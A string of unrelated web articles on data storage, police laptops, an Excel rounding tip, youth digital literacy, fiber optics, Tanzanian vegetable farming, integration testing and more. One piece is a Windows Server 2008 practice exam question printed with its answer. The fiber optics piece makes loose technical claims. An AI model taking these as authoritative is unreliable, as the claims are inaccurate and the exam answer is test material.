Researchers at the University of Southampton in the U.K. say they’ve been able to etch some of mankind’s most famous documents on a “5-dimensional” crystalline storage medium estimated to have a lifespan of billions of years. The researchers used self-assembled nanostructures created in fused quartz crystal to store data in five “dimensions,” writing each file in three layers of nanostructured dots separated by five micrometers of blank space. The data is encoded using the standard three dimensions of width, height, and depth. The fourth and fifth “dimensions” assign values to the size of the data “dot,” and how it is aligned. That all works out to a theoretical data capacity of 360 terabytes that can be stored in the dimensions of a conventional disc, like a DVD, the researchers said. The fused quartz essentially lasts forever, or 13.8 billion years at 190 degrees centigrade. It’s also thermally stable up to 1,000°C, the researchers claim. Why this matters: The Superman comics and movies showed how the native Kryptonians stored their knowledge on crystals, which young Kal-El (Superman) was able to access in his Fortress of Solitude. So yes, it’s really pretty cool to see these “Superman crystals” become reality. What we truly need, though, is an archival storage medium that can be read decades down the road. Who has a floppy disc drive anymore? Or even a CD-ROM reader? The cloud is one solution, but only if we trust that our personal information will be safe for generations in the hands of businesses who may or may not care that our digital lives are preserved.

A permanent record

The problem with the media that we’ve come to associate with computers is that most older formats simply aren’t permanent. According to the National Archives, magnetic media (tape) typically last between 10 and 50 years. Pressed discs, such as you might buy as a game or a piece of software, may last “generations” if preserved well.
But recordable discs can be unreadable in as little as a year, if the organic dyes used to store your data deteriorate to the point where they become unreadable. M-Disc technology, which is now supported by numerous Blu-ray and DVD burners, was created to solve this problem, too. It uses an inorganic layer as a way to preserve your data even longer: up to 1,000 years, the company claims. But each disc only holds 4.7GB, and a 50-pack (or a bit more than 200GB) costs $140. (M-Disc also supports 100-GB Blu-ray compatible discs, for $20.50.) But that’s the price you’ll pay for near-permanent data storage. That’s the goal that the Southampton researchers also hope to accomplish. “It is thrilling to think that we have created the technology to preserve documents and information and store it in space for future generations,” said Professor Peter Kazansky of the university’s Optoelectronics Research Center, in a statement. “This technology can secure the last evidence of our civilization: All we’ve learnt will not be forgotten.” The 5D “Superman crystals” technology was first proven out in 2013, when a 300-kilobit file was encoded. Now, the researchers have encoded the Universal Declaration of Human Rights, Newton’s Opticks, the Magna Carta, and the King James Bible using the technology. The Southampton team plans to present a paper on the subject at the International Society for Optical Engineering Conference in San Francisco this week, where hopefully questions will be asked and answered on two issues: exactly how fast data is encoded and read, and the projected cost of such a solution. The researchers also say that they're looking for a company to help commercialize the technology. The Southampton ORC released a video showing the encoding process, which uses what the researchers claim is an “ultrafast” laser. However, it’s just not clear how fast data can be read and written to the medium.
Still, the goal here is to create a permanent means of storing information, not a fast one. If such a process could be made viable, it’s not impossible to believe that humanity could build another Great Library of knowledge, one that could last virtually forever. Correction: An earlier version of this story implied that M-Disc only supported 4.7-GB DVDs; the format supports up to 25-, 50-, and 100-GB Blu-ray discs. This story, "Permanent 'Superman crystal' holographic storage is etched with the Bible, Magna Carta" was originally published by PCWorld.
<urn:uuid:2a8e4b59-075a-4e92-932f-762cecf8de95>
CC-MAIN-2017-04
http://www.itnews.com/article/3033071/storage/permanent-superman-crystal-holographic-storage-is-etched-with-the-bible-magna-carta.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00094-ip-10-171-10-70.ec2.internal.warc.gz
en
0.927633
1,024
3
3
In 1995, Will Davis, police planning manager for the Scottsdale Police Department in Arizona, hunched over his computer and wrote a paper titled "Mobile Technology 101." While typing, Davis imagined how the application of burgeoning mobile technologies would change law enforcement before the rollover into the new millennium. Surely it did not take much imagination to see that police officers would soon see their jobs transformed through the advent of mobile technology. However, in the five years that have passed, the use of mobile technology -- coupled with the power of wireless communications -- in law enforcement has failed to live up to its promise. True, hundreds of agencies nationwide have rolled out a startling array of laptop computers into their patrol cars. But, in many cases, the computer's power is barely tapped. "Ideally, the patrol officer should be able to access crime maps, street maps and incident reports. They should be able to make queries from their laptops for license-plate, drivers'-license and criminal-history data, and they should have car-to-car messaging and vehicle locators that show them where fellow officers are at any given moment," said Davis. "This is where I thought we were heading five years ago, and it is still where we are heading today. But it has taken longer to get there than I expected." That sentiment is echoed throughout departments nationwide. Few law enforcement professionals dispute the validity of the mobile-technology vision, yet the vision has remained elusive. The reasons are myriad -- everything from money, or lack thereof, to legacy systems has played a part in slowing progress toward the ideal mobile-patrol office. The first mobile radios were installed in black-and-whites in 1936, and by the 1980s many patrol cars were utilizing mobile-data terminals. These mobile-data terminals (MDTs), often referred to as "dumb terminals," were green-screen technology with limited capabilities. 
Used by other public safety agencies -- like paramedics, ambulance companies and fire departments -- they primarily allowed for visual dispatching over radio networks. In most cases, the actual dispatch came both by voice and data because of the normally unreliable nature of the early MDTs. Still, a working MDT allowed the user to refer to the dispatch address and to see where other units were going. For law enforcement, it was also the first effort at running tag and other basic data checks on suspects though, again, most officers continued to rely on the dispatcher for information. "We have no 'dumb terminals' anymore," said a jubilant Davis, conveying the news that all of Scottsdale's MDTs had been replaced with fully functional Panasonic laptop computers. With 130 laptops in the field, it is a goal to be proud of, but this technology advocate is quick to note that the road has been long and difficult. "It has taken us years to get rid of the MDTs, and we are still not using the laptops the way we would like to." In fact, some agencies point to the years of MDT history as being one factor in limiting law enforcement's full use of mobile computers. "Those MDTs were around for a long, long time, and it has affected the veteran officer's perception of what technology can do," said Terry Armstrong, director of information management of the Monroe County, Fla., Sheriff's Department. Armstrong, who has been testing mobile computers in the Sheriff's Department since 1996, said he felt fortunate to have started with a clean slate. "We never had mobile computers until 1996, so the officers are open to playing with them and seeing what they can do." 
Dollars for Tech Geeks

There is a certain sense of irony in realizing that in a decade when the Department of Justice has thrown billions of dollars at state and local law enforcement -- much of it earmarked specifically for mobile and wireless technologies -- a lack of funds may be the primary roadblock to law enforcement being completely wired. The COPS MORE grant program -- the primary funding vehicle for technological advancements in law enforcement for many years -- was structured so that generous grants were easy to land, and has certainly furthered the high-tech transformation in law enforcement. The problem, though, is that the grants program funds hardware and software, not "people-ware." Most police and sheriff's departments struggle daily with putting enough officers on the street to combat crime directly and ensure a highly visible presence to the public. Back-office personnel, the records clerks, civilian management and information technology personnel necessary to keep a modern agency humming along, are situated far down the financial food chain when elected officials vote on annual department budgets. Simply put, a police chief has a much better chance of getting money for two more sworn officers than he does for a single programmer. The grant money keeps coming in and departments keep launching new tech projects, but the same small team of IT professionals is expected to shoulder the load of increasingly complex implementations. It should come as little surprise that the projects often stutter and stall. Scottsdale has a records management system (RMS), a wireless system, computer-aided dispatch and a laptop project all under way. "Every time a grant opportunity came up, someone applied and we got all of them. Ideally, we should have a separate project manager over each one. Instead, I run them all," Davis said.
What Davis didn't mention is that while running four or more major implementation projects, he also continues to act as the department's troubleshooter and help desk for all technologies, and the coordinator for the department's Y2K preparations and response team. "We get by with temporary-duty (TDY) personnel mainly," said Karl Maracotta, a police officer and temporary-duty assignee in the Fort Lauderdale, Fla., Police Department's MIS department. Fort Lauderdale is shouldering a tech-implementation load similar to Scottsdale's. "It would help if we could at least get long-term TDYs but, mostly, they come and go."

A Living Legacy

Given the staffing load, it is a wonder many of these projects have made it to implementation. In fact, while it is more the rule than the exception to find officers with a laptop in their cars, the level of use varies widely. In many departments, the computers act as little more than an MDT -- allowing for simple license-plate and name searches through National Crime Information Center and state databases. In a few departments, the computer has the added capability of offering a redundant dispatch system, in which an officer receives a radio dispatch and a digital dispatch on the computer, and officers can also send car-to-car messages. In a handful of departments, the officer can also write his reports in the field, saving numerous trips to the department headquarters. In a very few departments, if any at all, that report goes directly into the department's RMS. And in none are officers regularly able to remotely access digital images, such as maps or mug shots. The main obstacle to this next generation of law enforcement technology is the legacy systems currently in place. "The officers can do their reports in the field and they can wirelessly transmit those reports to the office," explained Sgt. Michael Gregory, who is in charge of Fort Lauderdale's technology projects.
"But then they are printed out on the laser printer and records clerks enter the reports into the RMS." Fort Lauderdale is striving toward having those reports move through a paperless approval process and straight into the RMS, but like many departments -- Scottsdale included -- there is no adequate translation technology to interface new report-writing systems with an old, closed architecture RMS. That next step of seamless data translation will have to wait until departments manage to replace their old RMS with modern, open-architecture systems compatible with their laptops and report-writing software. "Right now, our officers print reports out in the office, using an infrared port. Eventually, the goal is to send it electronically," added Davis. "We just haven't been able to manage the data mapping necessary to get our report-writing system to communicate with the RMS." As for the transmission of highly complex data over the wireless networks, the challenge is even more daunting. "About 13 years ago, Scottsdale invested in a new, multimillion-dollar wireless infrastructure for dispatching and radio communications. That system is now also the backbone for our wireless laptop communications," explained Davis. "The transmission rate on the system is 4,800 baud and if we tried to send huge amounts of data -- like maps or photographs -- it would just clog and stop. But covering the expense to replace the system is something that is quite a ways off yet." For some departments, the solution to overloaded radio networks has been to turn to cellular digital packet data (CDPD) technology. CDPD offers several distinct solutions for law enforcement and a low entry cost, but it also can be a tough political sell. "You just pay for your modems and pay a monthly fee," said Sgt. Jeff Pauley of the Maryland-National Capital Park Police and a strong CDPD advocate. 
"On top of that, there are zero maintenance costs; the transmission rate is consistently fast -- easily able to support graphical data; and it provides a redundant back-up to your traditional radio dispatch system." Still, for a lot of departments, especially in lightly populated states, there is just not sufficient private tower coverage to support CDPD. In those that have the coverage but still shy away from CDPD, it is often because the department is reluctant to develop a reliance on a privately-owned network over which they exercise no control and where the cost is ongoing. For CDPD advocates, however, these objections hold little water. "Wireless radio networks cost millions. If you build it and find out you have a blank spot in your coverage, you pony up another bucket of money to build an extra tower," said Pauley. "If I have a blank spot, I just complain to the provider and they put up the tower out of their pocket. When technology advances, who pays to upgrade the network? They do. No more getting trapped by a legacy system that becomes outdated. "For 10 years or less use, a private CDPD network subscription is more cost-effective than a publicly owned wireless radio network," Pauley said. "What we have seen is that the effective life of any network, given the pace of technological change, is certainly 10 years or less, so we chose CDPD."

We Shall Overcome

Despite the obstacles, local law enforcement continues to move forward into a wireless world. Florida, with its statewide criminal justice intranet (CJ-Net), built and maintained by the state's Department of Law Enforcement, is surfing on the crest of the wave. Over this backbone, local agencies have access to each other's criminal-history and graphical databases through Web-browser technology. Other states, like Kansas, have built or are in the process of building similar networks.
"The state pays for it, maintains it and provides the backbone free to us -- that is the key," said Monroe County's Armstrong. "We use the backbone to get into Miami-Dade's criminal history [database], because a lot of our criminal traffic comes from there -- and Key West uses our mug-shot and criminal-history data. In addition, we wrote a line-up program in-house that resides on our server and is available to any agency in the state over CJ-Net." Perhaps Jonathan Zittrain, executive director of Harvard Law School's Berkman Center for Internet and Society, summed up the sometimes glacier-like process best when he observed: "Government has not moved into the digital age as quickly as private industry. Sometimes, it is a question of money; sometimes, the lack of the profit motive to spur faster change. But it is always moving. I wouldn't take the fact that the justice community's early steps have been particularly fitful to mean government will always be in the technological swamp. Remember, the Internet is only 4 to 5 years old and it has already changed the world; and we haven't seen anything yet." Justice and Technology Editor Ray Dussault is also a research director for the Law Enforcement Technology Acquisition Project. E-mail
Design for Business Continuity and Data Availability

These questions are based on 70-647: PRO: Windows Server 2008, Enterprise Administrator Self Test Software Practice Test

Objective: Design for business continuity and data availability.
Sub-objective: Design for data management and data access.

Single answer, multiple-choice

You are the administrator for a company that hosts a Web site customers use to order products and view merchandise. All servers are running Windows Server 2008. Due to increased workload, you plan to implement a second server to house the same Web site. Which of the following redundancy methods would eliminate a single point of failure and provide users with the most transparent failover in the case of a server failure?

- Use round-robin DNS (RRDNS).
- Install a single load-balancing switch.
- Use Network Load Balancing.
- Install redundant network cards.

Answer: C. Use Network Load Balancing.

Network Load Balancing (NLB) would eliminate a single point of failure and provide users with the most transparent failover in the case of a server failure. NLB is a component of the Windows Server 2008 operating system that balances the workload among multiple servers in an NLB cluster. It provides smooth, automatic failover for a user when the node being used fails.

Round-robin DNS (RRDNS) can also be used to balance the workload between servers hosting the same site. However, failover is less than smooth for the user and usually requires refreshing the browser. It involves creating DNS records that map the site name to multiple addresses and then manually configuring distribution of the workload.

Load-balancing switches are another way to balance workload, at the MAC-address level. The switches are quite expensive, and a single one would itself be a single point of failure.

Installing redundant network cards would provide neither load balancing nor redundancy. It would only allow a single machine to continue to accept work if one of the cards stopped working, and could improve performance.
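To make the RRDNS drawback concrete, here is a toy simulation of a client resolving a round-robin name. The addresses and server states are invented for illustration and have nothing to do with the exam environment; the point is that DNS keeps rotating a dead node's address into the answer because it has no notion of server health:

```python
from itertools import cycle

# Hypothetical addresses of two servers hosting the same site.
ADDRESSES = ["192.0.2.10", "192.0.2.11"]
up = {"192.0.2.10": True, "192.0.2.11": True}

def make_resolver():
    """Round-robin DNS: each lookup returns the address list rotated by one."""
    order = cycle(range(len(ADDRESSES)))
    def resolve():
        start = next(order)
        return ADDRESSES[start:] + ADDRESSES[:start]
    return resolve

resolve = make_resolver()

def fetch():
    # A naive client uses the first address it gets; DNS performs no
    # health check, so a dead server stays in the rotation.
    addr = resolve()[0]
    return "200 OK" if up[addr] else "connection failed"

print(fetch())            # both nodes up: served fine
up["192.0.2.10"] = False  # one node fails
print(fetch())            # this lookup rotated to the healthy node
print(fetch())            # ...but the dead address is still being handed out
```

NLB, by contrast, detects the failed node through its heartbeat mechanism and converges the cluster, so clients keep reaching a live server at the same virtual address without refreshing anything.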
Okay, this is just plain weird: that calculation takes a raw number "8" and multiplies it by the result of a series of calculations found in the second cell, displayed as "$20.55". The end result states that 8 * 20.55 is 164.38, which for most of us seems to be really wrong. Especially for a program that is supposed to do this right! The catch is that the cell only displays $20.55; the value actually stored in it is closer to 20.5475, and 8 * 20.5475 does equal 164.38.

So, just how do we "fix" this? A quick search turned up the culprit: under File -> Options -> Advanced we find the Set precision as displayed setting. When we enable it and click OK, Excel becomes quite unhappy about it: "Data will permanently lose accuracy."

Well, be that as it may, that "loss in accuracy" helps the old human brain to see what it really needs to see: the expected result! This works for all versions of Excel too.

The solution was found here:

Microsoft Small Business Specialists
Co-Author: SBS 2008 Blueprint Book
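The behaviour is easy to reproduce outside Excel. In this sketch the stored value 20.5475 is inferred by dividing 164.38 by 8; it is an assumption about the worksheet, not a number stated in the post:

```python
stored = 20.5475                 # full-precision value actually held in the cell
displayed = round(stored, 2)     # what a two-decimal currency format shows

print(displayed)                 # 20.55 -> what the user sees
print(round(8 * stored, 2))      # 164.38 -> what Excel computes (full precision)
print(round(8 * displayed, 2))   # 164.4 -> what the eyeball expects

# "Set precision as displayed" effectively does this once, permanently:
stored = round(stored, 2)        # the extra digits are gone for good
print(round(8 * stored, 2))      # 164.4 -> display and arithmetic now agree
```

That is exactly the trade Excel warns about: the on-screen numbers become honest, but the discarded precision cannot be recovered.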
OTTAWA, ONTARIO--(Marketwired - March 31, 2014) - Canadian youth are not as digitally literate as adults may think they are, according to new research released today by MediaSmarts. Though today's young people have grown up immersed in digital media, they still rely on parents and teachers to help them advance their skills in areas such as searching and verifying online information. MediaSmarts, a Canadian not-for-profit organization, surveyed over 5,400 students in classrooms across the country on their Internet behaviours and attitudes for its Young Canadians in a Wired World study. The fourth report from the survey findings - Experts or Amateurs? Gauging Young Canadians' Digital Literacy Skills - explores the level of young people's digital literacy, how they are learning these skills and how well digital technologies are being used in classrooms to support digital literacy. The research shows that although students are actively engaging with digital media through social networking, gaming and video streaming, they are learning and applying only the digital skills they consider essential to the context of the task. For example, across all age groups, youth use a variety of strategies to verify online information, but will often only put their skills to use if they see an immediate benefit to doing so, such as for a school project. Youth are eager to learn more skills, with teachers being one of their main sources of information; however, there are often technological barriers in the classroom such as blocked websites and a lack of access to digital devices. 
"Young people are mistakenly considered experts in digital technologies because they're so highly connected, but they are still lacking many essential digital literacy skills," says Jane Tallim, Co-Executive Director of MediaSmarts, "Parents and teachers are playing a crucial role in teaching them to navigate the digital world, but we need to ensure that digital literacy programs reflect youth's lived experiences so they will find the skills relevant enough to learn and apply them." Key findings include: - 53% of girls have learned how to search for information online from teachers compared to 38 percent of boys. - Parents (47%) and teachers (45%) are the main sources for learning about searching for information online. - 61% of students use more than one search engine to find information online. - 35% of students in grades 7-11 use advanced search engine tools. - 80% of students have received instruction in evaluating and authenticating online information. - 46% of students (29% in Grade 4 and 72% in Grade 11) agree with the statement, "Downloading music, TV shows or movies illegally is not a big deal". - 36% say that they have had trouble finding something they need for their school work due to filtering software. - 41% of Grade 9 students say their teachers have used social media to help them learn. To view the full report, infographic and slide show, visit http://mediasmarts.ca/ycww/experts-or-amateurs-gauging-young-canadians-digital-literacy-skills. Follow the conversation using hashtag #YCWW. Young Canadians in a Wired World - Phase III: Experts or Amateurs? Gauging Young Canadians' Digital Literacy Skills was made possible by financial contributions from the Canadian Internet Registration Authority, the Office of the Privacy Commissioner of Canada and the Alberta Teachers' Association. Previous reports based on the Young Canadians in a Wired World student survey data focused on cyberbullying, online privacy and online interactions. 
They can be downloaded at http://mediasmarts.ca/ycww. Future reports will look at offensive content and online relationships. MediaSmarts is a Canadian not-for-profit centre for digital and media literacy. Its vision is that young people have the critical thinking skills to engage with media as active and informed digital citizens.
Providing information in accessible format to people with disabilities is becoming increasingly important as organisations better understand the financial, moral, and legal benefits. Progress can already be seen in the design of some websites but less progress has been made in providing accessible PDF documents. This is partly an historical problem because many years ago there was no accessible PDF format. More recently it was felt that there were no good tools for creating accessible PDF. Even now there is still a common belief that creating accessible PDF is both difficult and expensive. In reality there are now tools available to do the job well, even if the choice is fairly limited.

Up to now creating accessible PDF has been considered a two-stage process:
- Converting the source document into a tagged PDF. This function is either built into, or available as a plug-in for, OpenOffice, Lotus Symphony, or Microsoft Office.
- Testing and remediating this tagged PDF to make it fully accessible. These functions are provided by Adobe Acrobat or NetCentric CommonLook.

When an error is identified there are two possible methods available for fixing it. The simple way is to use the tool to fix the PDF. The other is to go back to the source and make changes that will produce a better output next time. The advantage of changing the source is that future versions of the document will not create the error. The problem with this method is that it is relatively expensive; the change has to be made by the author and then the whole document retested and potentially remediated, and this cycle may have to be repeated more than once. This is a classic example of picking up errors late in a development cycle, with the inevitable high costs. This is a well documented problem in software development, where it is generally agreed that the cost of fixing an error goes up by an order of magnitude between coding and testing.
Only being able to check for accessibility in the testing and remediating stage is rather as if spell-check were only available to the editor and not to the author of a document. If that were the case, the editor would have to mark up the document with the spelling mistakes and pass it back to the author for updates. What was needed was a spell-checker for accessibility, an 'access-checker', that would pick up any issues in the source document which might convert incorrectly or incompletely. At CSUN, NetCentric announced the beta version of PAW (PDF Accessibility Wizard) for MS Word, which provides exactly this function. PAW is an add-in to Microsoft Office Word 2007. The checks and tests are started by a 'save to accessible PDF' command. This command runs all the checks, issues any prompts for additional information, and then creates the final accessible PDF file. For example, if the author has inserted a table into the document, PAW will prompt for a description of the table and information about column and row headings. Where the information can be added to the source Word document this will be updated; in the case of information which cannot be added to the source (such as table row headers), it will be noted separately and reused if the save command is repeated on the same file. The output of the save is thus both an accessible PDF and an improved Word document. The improved Word document could then be used to create a DAISY file, providing an alternative accessible format. The checks and prompts are based on NetCentric's experience with the testing tool in CommonLook for Adobe for Section 508. Having a deep understanding of what checks need to be made by the editor to ensure compliance made it easier to develop a comprehensive set of prompts and checks for the author.
Answering the prompts at the time of writing, when the ideas are fresh in the author's mind, should be much easier than having to add the information at a later date, when the document has to be reread to refresh the thoughts. The author should be much more willing to add the extra detail as part of the flow rather than as a later distraction. The advantage of this solution is that it is one step instead of two, because the conversion, testing and remediation are all performed together. Besides the obvious requirement for Word 2007 there are no other prerequisites. The access-checker will reduce the number of iterations between the author and the editor, hence reducing the overall development time and the total cost. The lack of prerequisite software will also reduce the total cost of a Word to accessible PDF solution. Bloor Research believes that it should pay for itself very rapidly in reduced staff and software costs.
New NASA site orbits around manned space flight
Site includes Web 2.0 tools for interacting with NASA
- By Doug Beizer - Jun 11, 2009
NASA has launched a new Web site designed to let the public participate in a review of planned human space flights. The site provides access to documents and information, and will allow the public to track activities of a committee examining manned space flight, NASA said June 5. Visitors also can get updates and provide input through Web 2.0 tools such as Twitter, Flickr, polls and Really Simple Syndication feeds. The NASA committee associated with the Web site is the Review of U.S. Human Space Flight Plans Committee. The public can submit questions, upload documents or comment about topics relevant to the committee’s operations. The committee will conduct public meetings during the course of the review, NASA said. The first meeting will be held June 17 in Washington. Doug Beizer is a staff writer for Federal Computer Week.
Optical fibers are strands of super-pure, flexible glass used in telecommunications, and they can be as thin as a human hair. These fine strands carry digital signals in the form of light. Each fiber has a two-layer plastic coating that reflects light back into the core and moves it forward without too much loss. Many such fibers are arranged together in a bundle, and this bundle is called an optical fiber cable. A buffer coating gives the cable a final outer layer for additional protection from water and other damaging agents.

Fiber optic communication travels through two main types of fiber optic cable. In single-mode cable, laser light transmits the signal; in multimode cable, LEDs (light-emitting diodes) do this job. Multimode cable is thicker and heavier than single-mode cable.

The basic principle of total internal reflection is what carries light signals in optical fiber communication from origin to destination. In addition to the cable itself, a few other parts are basic components of the system. A "transmitter" is a device that generates the coded light signal sent through the cable. When optical signals travel a long distance, they become weak; an "optical regenerator" then copies the complete signal and retransmits it at full strength for the rest of the journey. A shorter run of optical cable may not need a regenerator. At the destination, an "optical receiver" receives the coded light signals and decodes them into a readable form.

Apart from telecommunications, the technology of optical fiber communication comes in handy for Internet connections, medical imaging, inspecting plumbing and sewer lines, and even digital television. Optical fiber cables are more helpful than conventional copper cables.

What are the advantages of fiber optic cables?

More cost-effective
Fiber optic cables are more cost-effective than copper wire. By replacing copper with optical fibers, service providers as well as customers save a lot of money.

Higher carrying capacity
The higher carrying capacity of optical fibers over copper wire is another advantage. Transmitting more signals at a time without much interference is of great help to customers.

Flexible, lighter and less bulky
In most urban places there is an acute shortage of space, and the limited space available is shared among subways, sewer lines and power wires. Being lighter and less bulky, fiber cables can fit in crowded and smaller places, and it is easy to transport them to different installation sites. Flexibility is their gifted advantage; this very character lets them move through corners quite easily.

Less degradation of signals
Fiber optic cable preserves signal strength over a greater distance than traditional electric wire. Optical signals transmitted through the cable do not interfere with each other, so the signals you receive are easier and clearer to understand.

Use less power
The signal generators used in optical fiber communication use less energy and thus save a considerable amount of money on power. Since the signals are digital in nature, computer networks pick them up easily.

Safer
Since optical fibers use light for signal transmission instead of electricity, incidences of fire hazards and electric shocks are ruled out. This makes them safer than conventional wires.

Such being the amazing capabilities of bulk fiber optic cable, new possibilities in the field of optical fiber communication are always on the rise.
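Total internal reflection, the principle mentioned above, only happens when light meets the core-cladding boundary beyond a critical angle. A quick sketch of that calculation; the refractive indices are illustrative values typical of silica fiber, not figures from the article:

```python
import math

# Assumed refractive indices for a silica fiber (illustrative values):
n_core = 1.48      # doped glass core
n_cladding = 1.46  # cladding layer surrounding the core

# Snell's law gives total internal reflection for incidence angles
# (measured from the boundary normal) above the critical angle:
#   theta_c = arcsin(n_cladding / n_core)
theta_c = math.degrees(math.asin(n_cladding / n_core))
print(f"critical angle: {theta_c:.1f} degrees")  # ~80.6 degrees

# Rays striking the boundary more steeply than this leak into the
# cladding; shallower rays bounce along the core with little loss.
```

Because the two indices are so close, the critical angle is large, which is why light must enter the fiber nearly parallel to its axis to be guided.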
Production of tomatoes is the highest, with a total production of 159,805 tons and acreage of 7,170 hectares. The second vegetable crop is cabbage and the third is onion. Carrots are a minor crop with a production of 4,029 tons. Other vegetables include eggplant, cauliflower, beans and indigenous vegetables like amaranth and okra. Of the horticultural regions, Iringa shows the highest production and acreage, and yield levels in this region are also high compared to the other regions. Only 10% of the yield is used for home consumption; the remainder is intended for sale, but for all kinds of vegetables losses are high. Although no good documentation is available, it is estimated that about 31% is lost, leaving only 59% for sale. Losses are caused by pests and diseases, inadequate sorting/grading, rough handling, lack of cooled storage facilities and lack of adequate packing material. Besides this, a good quality control system and grading system are also lacking. Only 13% of the farmers perform some sort of grading, where only rotten or misshapen fruits are removed.

Mango is one of the common fruits in Asia, Central and South America and Africa. In Tanzania mango is on the list of the five most popular fruits, i.e., bananas, oranges, pineapples, mangoes and pears. There are a number of products made from mango, such as juice, pulp, pickles, mango flavouring, mango kernel oil, and powder. These products have been well introduced and accepted in a variety of market segments around the world. In Tanzania and Africa in general, processing of mango is less developed than in other continents, and the varieties grown are generally most suitable for local markets. Processed mango products, e.g., dried fruit, jam, jellies, syrup and other mango products, are fast gaining market share and commanding better prices than other tropical fruits.
Access to the EU and USA market is subject to stringent standards and certification requirements (GLOBAL GAP, HACCP and other Ethical Trading Initiatives (ETI)), which makes export of mango from some countries, including Tanzania, not possible at this time.
11 months of the year have 30 or 31 days. Why not take two of the months with 31 days and round out February? Then seven months would have 30 days and five would have 31? It makes sense, but that's not always how history works. Find out the real reason why February has 28 days - most of the time.
NOAA adds Great Lakes images
- By Doug Beizer - Apr 24, 2009
The National Oceanic and Atmospheric Administration helped develop a new feature on Google Earth that lets visitors view detailed three-dimensional mapping of the Great Lakes, agency officials announced April 23. Visitors to the new Great Lakes feature can explore the canyons and sandbars in eastern Lake Superior, the Lake Michigan mid-lake reef complex, and the old river channel – now underwater – that once connected Lakes Michigan and Huron at the Straits of Mackinac, NOAA officials said. “NOAA’s data opens up the fascinating world underneath the planet’s largest fresh water system,” said Richard Spinrad, NOAA assistant administrator for oceanic and atmospheric research and a Google advisory board member. NOAA’s Great Lakes Environmental Research Laboratory in Ann Arbor, Mich., worked with the National Geophysical Data Center in Boulder, Colo., to produce the Google Earth tour to highlight the coastal and subsurface features. “I expect that others will see the potential of this tool and create their own Great Lakes tours and expand the possibilities,” said Marie Colton, GLERL acting director. The Great Lakes information was compiled from archival U.S. and Canadian soundings that span more than 75 years. David Schwab, a physical oceanographer at GLERL, generated a map of lake depths from the joint project and provided it to Google to form the basis for the Great Lakes topography. To highlight some of the coastal and subsurface features of the Great Lakes, the NOAA Great Lakes Environmental Research Laboratory created a narrated Google Earth tour. Doug Beizer is a staff writer for Federal Computer Week.
Integration testing examines if the parts of an application are able to communicate and function together—and if so, how well. There are many approaches to a successful integration test, but the commonly used “mocks/in-memory” testing method may not provide the same quality results that it does when working on the unit testing level. Developers may look at using in-memory testing to save time and perform more tests, but this approach removes much of what’s important in an integration test. Integration testing approaches that utilize the application’s actual database hardware infrastructure or simulated recreation provide much more reliable, real-world, easily measurable results. Integration Testing with Mocks/In-Memory Businesses often go with mocks/in-memory testing in the development process because it’s faster. Utilizing mocked in-memory, or RAM-stored, database information for a test essentially eliminates seek-time delays associated with using a disk-based database. This method is extremely popular for unit testing because the tests are self-contained. If your application is already running on an in-memory database, then this method will provide accurate results. However, in-memory tests utilize fewer CPU instructions and don’t always support the same SQL functions the actual testing database uses. Therefore, you won’t get accurate performance data. Repeated delays may add up to performance issues which would show up in real world use, but not on the in-memory test. Swapping in real data parts in place of information coming from an actual server is not only problematic because of its inaccurate performance results, but also because these tests are difficult to maintain. Additionally, using in-memory testing to initiate and load multiple tests at once can cause problems. While this method saves time, it can cause tests to overlap each other and interfere with results. 
Problems arise with in-memory testing when it doesn’t accurately represent the production environment, which makes it difficult to recommend for the integration testing step. It does not make a lot of sense to work around these additional issues when the test itself already fails to provide accurate results. Using an Actual Database The most accurate results come from utilizing the actual hardware database infrastructure in the test. If the actual database is unavailable or not yet implemented, the development team can use a similar database server to run the test. This method eliminates all performance gains from the in-memory tests and produces tangible, real-world results. Additionally, running the test from an alternative data source means the test results won’t provide the same level of insight into the application architecture as using a disk-based database. However, tests will take much longer to perform when running on a disk-based platform compared to an in-memory platform, meaning the development team will not be able to conduct as many tests within the same time period. This can be a drawback for regular tests, but the importance of the integration testing step in the development process means it’s a wise investment to get it right. Development teams can improve test times by implementing more efficient database caching techniques for the test. The main purpose of integration testing is to measure the interface between different parts of the application. Many of these parts may require making calls to the database, which takes time and is subject to communication problems, so replacing the actual database with an in-memory solution tests a platform that performs differently. If your business is looking to improve its application development practices, don’t hesitate to contact the integration testing experts at Apica.
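The point about swapping connection targets can be sketched with SQLite standing in for whatever engine the application really uses (an assumption made here for brevity). The test body is identical in both variants; only the file-backed one pays the commit and seek costs the production database will actually pay:

```python
import os
import sqlite3
import tempfile

def create_orders_table(conn):
    conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, item TEXT)")
    conn.commit()

def place_order(conn, item):
    # The integration point under test: application code writing
    # through the real database layer.
    cur = conn.execute("INSERT INTO orders (item) VALUES (?)", (item,))
    conn.commit()
    return cur.lastrowid

def count_orders(conn):
    return conn.execute("SELECT COUNT(*) FROM orders").fetchone()[0]

# In-memory variant: fast and self-contained, but it exercises no disk
# I/O, so its timings say little about production behaviour.
mem = sqlite3.connect(":memory:")
create_orders_table(mem)
place_order(mem, "widget")
assert count_orders(mem) == 1

# Disk-backed variant: identical test body, but every commit now pays
# the kind of I/O cost the production engine will pay.
path = os.path.join(tempfile.mkdtemp(), "test.db")
disk = sqlite3.connect(path)
create_orders_table(disk)
place_order(disk, "widget")
assert count_orders(disk) == 1
disk.close()
```

Timing the two variants over many iterations makes the article's argument visible: the in-memory run looks artificially fast, and any SQL feature the in-memory engine lacks simply never gets exercised.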
Create and execute a communication plan to ensure that the right messages are properly communicated. A communications plan is used to make sure that current information about program progress and benefits is provided in an effective manner to all pertinent internal and external parties. The plan should include: - What is to be communicated (message content) - Who is responsible and accountable for delivering the message - Who the recipients are - When and how often (frequency) the message is to be delivered - What medium is to be used to deliver the message Effective communication is critical for garnering support, acceptance, and participation from stakeholder groups.
Mars Rover Curiosity's Rock-Blasting Laser Reaches Milestone
The laser has been fired 100,000 times so far, helping scientists uncover more amazing details about the Martian surface.
